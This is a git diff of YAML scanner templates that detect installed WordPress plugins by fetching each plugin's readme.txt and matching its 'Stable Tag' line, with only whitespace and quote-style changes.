a/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml b/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml index 76deae52d4..d22910c45c 100644 --- a/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml +++ b/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml @@ -1,4 +1,3 @@ - id: wordpress-woocommerce-gateway-paypal-express-checkout info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: plugin_namespace: woocommerce-gateway-paypal-express-checkout - wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout + wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-paypal-express-checkout/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml b/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml index 1ac476a9e6..e36a1a70c4 100644 --- a/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml +++ b/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml @@ -1,4 +1,3 @@ - id: wordpress-woocommerce-gateway-stripe info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: plugin_namespace: woocommerce-gateway-stripe - wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe + wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-stripe/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-woocommerce-payments.yaml b/technologies/wordpress/wordpress-woocommerce-payments.yaml index 6cda18c432..cf3598f149 100644 --- a/technologies/wordpress/wordpress-woocommerce-payments.yaml +++ b/technologies/wordpress/wordpress-woocommerce-payments.yaml @@ -1,4 +1,3 @@ - id: wordpress-woocommerce-payments info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/woocommerce-payments/ metadata: plugin_namespace: woocommerce-payments - wpscan: https://wpscan.com/plugin/woocommerce-payments + wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce-payments/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml b/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml index 33ee3925a2..c0ef0f72f6 100644 --- a/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml +++ b/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml @@ -1,4 +1,3 @@ - id: wordpress-woocommerce-paypal-payments info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: plugin_namespace: woocommerce-paypal-payments - wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments + wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce-paypal-payments/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml b/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml index e3d9c76057..432fcad38f 100644 --- a/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml +++ b/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml @@ -1,4 +1,3 @@ - id: wordpress-woocommerce-pdf-invoices-packing-slips info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: plugin_namespace: woocommerce-pdf-invoices-packing-slips - wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips + wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-invoices-packing-slips/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-woocommerce-services.yaml b/technologies/wordpress/wordpress-woocommerce-services.yaml index cb6ac7329e..c629f28c73 100644 --- a/technologies/wordpress/wordpress-woocommerce-services.yaml +++ b/technologies/wordpress/wordpress-woocommerce-services.yaml @@ -1,4 +1,3 @@ - id: wordpress-woocommerce-services info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/woocommerce-services/ metadata: plugin_namespace: woocommerce-services - wpscan: https://wpscan.com/plugin/woocommerce-services + wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce-services/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-woocommerce.yaml b/technologies/wordpress/wordpress-woocommerce.yaml index 6e167452d8..a8e24deb94 100644 --- a/technologies/wordpress/wordpress-woocommerce.yaml +++ b/technologies/wordpress/wordpress-woocommerce.yaml @@ -1,4 +1,3 @@ - id: wordpress-woocommerce info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/woocommerce/ metadata: plugin_namespace: woocommerce - wpscan: https://wpscan.com/plugin/woocommerce + wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-woosidebars.yaml b/technologies/wordpress/wordpress-woosidebars.yaml index 20958ba714..19741b2620 100644 --- a/technologies/wordpress/wordpress-woosidebars.yaml +++ b/technologies/wordpress/wordpress-woosidebars.yaml @@ -1,4 +1,3 @@ - id: wordpress-woosidebars info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/woosidebars/ metadata: plugin_namespace: woosidebars - wpscan: https://wpscan.com/plugin/woosidebars + wpscan: https://wpscan.com/plugin/woosidebars tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woosidebars/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wordfence.yaml b/technologies/wordpress/wordpress-wordfence.yaml index 529bb856f4..4f22ae37d4 100644 --- a/technologies/wordpress/wordpress-wordfence.yaml +++ b/technologies/wordpress/wordpress-wordfence.yaml @@ -1,4 +1,3 @@ - id: wordpress-wordfence info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wordfence/ metadata: plugin_namespace: wordfence - wpscan: https://wpscan.com/plugin/wordfence + wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wordfence/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wordpress-importer.yaml b/technologies/wordpress/wordpress-wordpress-importer.yaml index 66fc824581..ef4489a009 100644 --- a/technologies/wordpress/wordpress-wordpress-importer.yaml +++ b/technologies/wordpress/wordpress-wordpress-importer.yaml @@ -1,4 +1,3 @@ - id: wordpress-wordpress-importer info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wordpress-importer/ metadata: plugin_namespace: wordpress-importer - wpscan: https://wpscan.com/plugin/wordpress-importer + wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wordpress-importer/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wordpress-seo.yaml b/technologies/wordpress/wordpress-wordpress-seo.yaml index dbc1a7b82d..5c8410aa7d 100644 --- a/technologies/wordpress/wordpress-wordpress-seo.yaml +++ b/technologies/wordpress/wordpress-wordpress-seo.yaml @@ -1,4 +1,3 @@ - id: wordpress-wordpress-seo info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wordpress-seo/ metadata: plugin_namespace: wordpress-seo - wpscan: https://wpscan.com/plugin/wordpress-seo + wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wordpress-seo/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-worker.yaml b/technologies/wordpress/wordpress-worker.yaml index acdadebb3a..96539b0eca 100644 --- a/technologies/wordpress/wordpress-worker.yaml +++ b/technologies/wordpress/wordpress-worker.yaml @@ -1,4 +1,3 @@ - id: wordpress-worker info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/worker/ metadata: plugin_namespace: worker - wpscan: https://wpscan.com/plugin/worker + wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/worker/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-fastest-cache.yaml b/technologies/wordpress/wordpress-wp-fastest-cache.yaml index 415d977d4b..aa50ef9265 100644 --- a/technologies/wordpress/wordpress-wp-fastest-cache.yaml +++ b/technologies/wordpress/wordpress-wp-fastest-cache.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-fastest-cache info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: plugin_namespace: wp-fastest-cache - wpscan: https://wpscan.com/plugin/wp-fastest-cache + wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-fastest-cache/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-file-manager.yaml b/technologies/wordpress/wordpress-wp-file-manager.yaml index e517a14f2e..ecac702677 100644 --- a/technologies/wordpress/wordpress-wp-file-manager.yaml +++ b/technologies/wordpress/wordpress-wp-file-manager.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-file-manager info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-file-manager/ metadata: plugin_namespace: wp-file-manager - wpscan: https://wpscan.com/plugin/wp-file-manager + wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-file-manager/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-google-maps.yaml b/technologies/wordpress/wordpress-wp-google-maps.yaml index 0da079cc4d..b174abbf5f 100644 --- a/technologies/wordpress/wordpress-wp-google-maps.yaml +++ b/technologies/wordpress/wordpress-wp-google-maps.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-google-maps info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-google-maps/ metadata: plugin_namespace: wp-google-maps - wpscan: https://wpscan.com/plugin/wp-google-maps + wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-google-maps/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-mail-smtp.yaml b/technologies/wordpress/wordpress-wp-mail-smtp.yaml index 3309e8735c..5e33ce2345 100644 --- a/technologies/wordpress/wordpress-wp-mail-smtp.yaml +++ b/technologies/wordpress/wordpress-wp-mail-smtp.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-mail-smtp info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: plugin_namespace: wp-mail-smtp - wpscan: https://wpscan.com/plugin/wp-mail-smtp + wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-maintenance-mode.yaml b/technologies/wordpress/wordpress-wp-maintenance-mode.yaml index aa48586418..f253ba6191 100644 --- a/technologies/wordpress/wordpress-wp-maintenance-mode.yaml +++ b/technologies/wordpress/wordpress-wp-maintenance-mode.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-maintenance-mode info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: plugin_namespace: wp-maintenance-mode - wpscan: https://wpscan.com/plugin/wp-maintenance-mode + wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-maintenance-mode/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-migrate-db.yaml b/technologies/wordpress/wordpress-wp-migrate-db.yaml index af8a032196..3cd050abee 100644 --- a/technologies/wordpress/wordpress-wp-migrate-db.yaml +++ b/technologies/wordpress/wordpress-wp-migrate-db.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-migrate-db info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-migrate-db/ metadata: plugin_namespace: wp-migrate-db - wpscan: https://wpscan.com/plugin/wp-migrate-db + wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-migrate-db/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-multibyte-patch.yaml b/technologies/wordpress/wordpress-wp-multibyte-patch.yaml index d6a5318eec..01dc69a7c2 100644 --- a/technologies/wordpress/wordpress-wp-multibyte-patch.yaml +++ b/technologies/wordpress/wordpress-wp-multibyte-patch.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-multibyte-patch info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: plugin_namespace: wp-multibyte-patch - wpscan: https://wpscan.com/plugin/wp-multibyte-patch + wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-multibyte-patch/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-optimize.yaml b/technologies/wordpress/wordpress-wp-optimize.yaml index 2a1bceaf77..a273a898ed 100644 --- a/technologies/wordpress/wordpress-wp-optimize.yaml +++ b/technologies/wordpress/wordpress-wp-optimize.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-optimize info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-optimize/ metadata: plugin_namespace: wp-optimize - wpscan: https://wpscan.com/plugin/wp-optimize + wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-optimize/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-pagenavi.yaml b/technologies/wordpress/wordpress-wp-pagenavi.yaml index c32ee6bc4e..e8951c9a56 100644 --- a/technologies/wordpress/wordpress-wp-pagenavi.yaml +++ b/technologies/wordpress/wordpress-wp-pagenavi.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-pagenavi info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-pagenavi/ metadata: plugin_namespace: wp-pagenavi - wpscan: https://wpscan.com/plugin/wp-pagenavi + wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-pagenavi/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-reset.yaml b/technologies/wordpress/wordpress-wp-reset.yaml index e82f4ecd2d..741e6da0fd 100644 --- a/technologies/wordpress/wordpress-wp-reset.yaml +++ b/technologies/wordpress/wordpress-wp-reset.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-reset info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-reset/ metadata: plugin_namespace: wp-reset - wpscan: https://wpscan.com/plugin/wp-reset + wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-reset/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-sitemap-page.yaml b/technologies/wordpress/wordpress-wp-sitemap-page.yaml index f0b55eb8a2..32d65af705 100644 --- a/technologies/wordpress/wordpress-wp-sitemap-page.yaml +++ b/technologies/wordpress/wordpress-wp-sitemap-page.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-sitemap-page info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: plugin_namespace: wp-sitemap-page - wpscan: https://wpscan.com/plugin/wp-sitemap-page + wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-sitemap-page/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-smushit.yaml b/technologies/wordpress/wordpress-wp-smushit.yaml index 31739b7ab2..263e2a3b49 100644 --- a/technologies/wordpress/wordpress-wp-smushit.yaml +++ b/technologies/wordpress/wordpress-wp-smushit.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-smushit info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-smushit/ metadata: plugin_namespace: wp-smushit - wpscan: https://wpscan.com/plugin/wp-smushit + wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-smushit/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-statistics.yaml b/technologies/wordpress/wordpress-wp-statistics.yaml index a936c13bc5..df7ece5790 100644 --- a/technologies/wordpress/wordpress-wp-statistics.yaml +++ b/technologies/wordpress/wordpress-wp-statistics.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-statistics info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-statistics/ metadata: plugin_namespace: wp-statistics - wpscan: https://wpscan.com/plugin/wp-statistics + wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-statistics/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-super-cache.yaml b/technologies/wordpress/wordpress-wp-super-cache.yaml index f1eb6675d6..e7c311a6cb 100644 --- a/technologies/wordpress/wordpress-wp-super-cache.yaml +++ b/technologies/wordpress/wordpress-wp-super-cache.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-super-cache info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-super-cache/ metadata: plugin_namespace: wp-super-cache - wpscan: https://wpscan.com/plugin/wp-super-cache + wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-super-cache/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wp-user-avatar.yaml b/technologies/wordpress/wordpress-wp-user-avatar.yaml index cba8bca38a..300683e02a 100644 --- a/technologies/wordpress/wordpress-wp-user-avatar.yaml +++ b/technologies/wordpress/wordpress-wp-user-avatar.yaml @@ -1,4 +1,3 @@ - id: wordpress-wp-user-avatar info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wp-user-avatar/ metadata: plugin_namespace: wp-user-avatar - wpscan: https://wpscan.com/plugin/wp-user-avatar + wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wp-user-avatar/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml b/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml index e2cdfb47ad..49e66b0432 100644 --- a/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml +++ b/technologies/wordpress/wordpress-wpcf7-recaptcha.yaml @@ -1,4 +1,3 @@ - id: wordpress-wpcf7-recaptcha info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: plugin_namespace: wpcf7-recaptcha - wpscan: https://wpscan.com/plugin/wpcf7-recaptcha + wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wpcf7-recaptcha/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wpcf7-redirect.yaml b/technologies/wordpress/wordpress-wpcf7-redirect.yaml index da6c9aa1d8..bc199e77fa 100644 --- a/technologies/wordpress/wordpress-wpcf7-redirect.yaml +++ b/technologies/wordpress/wordpress-wpcf7-redirect.yaml @@ -1,4 +1,3 @@ - id: wordpress-wpcf7-redirect info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: plugin_namespace: wpcf7-redirect - wpscan: https://wpscan.com/plugin/wpcf7-redirect + wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wpcf7-redirect/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wpforms-lite.yaml b/technologies/wordpress/wordpress-wpforms-lite.yaml index 83af57d9da..cd018b5513 100644 --- a/technologies/wordpress/wordpress-wpforms-lite.yaml +++ b/technologies/wordpress/wordpress-wpforms-lite.yaml @@ -1,4 +1,3 @@ - id: wordpress-wpforms-lite info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wpforms-lite/ metadata: plugin_namespace: wpforms-lite - wpscan: https://wpscan.com/plugin/wpforms-lite + wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wpforms-lite/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-wps-hide-login.yaml b/technologies/wordpress/wordpress-wps-hide-login.yaml index 57d553c989..ae60d5ddf3 100644 --- a/technologies/wordpress/wordpress-wps-hide-login.yaml +++ b/technologies/wordpress/wordpress-wps-hide-login.yaml @@ -1,4 +1,3 @@ - id: wordpress-wps-hide-login info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/wps-hide-login/ metadata: plugin_namespace: wps-hide-login - wpscan: https://wpscan.com/plugin/wps-hide-login + wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wps-hide-login/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml b/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml index 52c0cef0c0..1c907cfa93 100644 --- a/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml +++ b/technologies/wordpress/wordpress-yith-woocommerce-compare.yaml @@ -1,4 +1,3 @@ - id: wordpress-yith-woocommerce-compare info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/yith-woocommerce-compare/ metadata: plugin_namespace: yith-woocommerce-compare - wpscan: https://wpscan.com/plugin/yith-woocommerce-compare + wpscan: https://wpscan.com/plugin/yith-woocommerce-compare tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-compare/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml b/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml index ccf4d7d013..b0554eb019 100644 --- a/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml +++ b/technologies/wordpress/wordpress-yith-woocommerce-wishlist.yaml @@ -1,4 +1,3 @@ - id: wordpress-yith-woocommerce-wishlist info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: plugin_namespace: yith-woocommerce-wishlist - wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist + wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 From 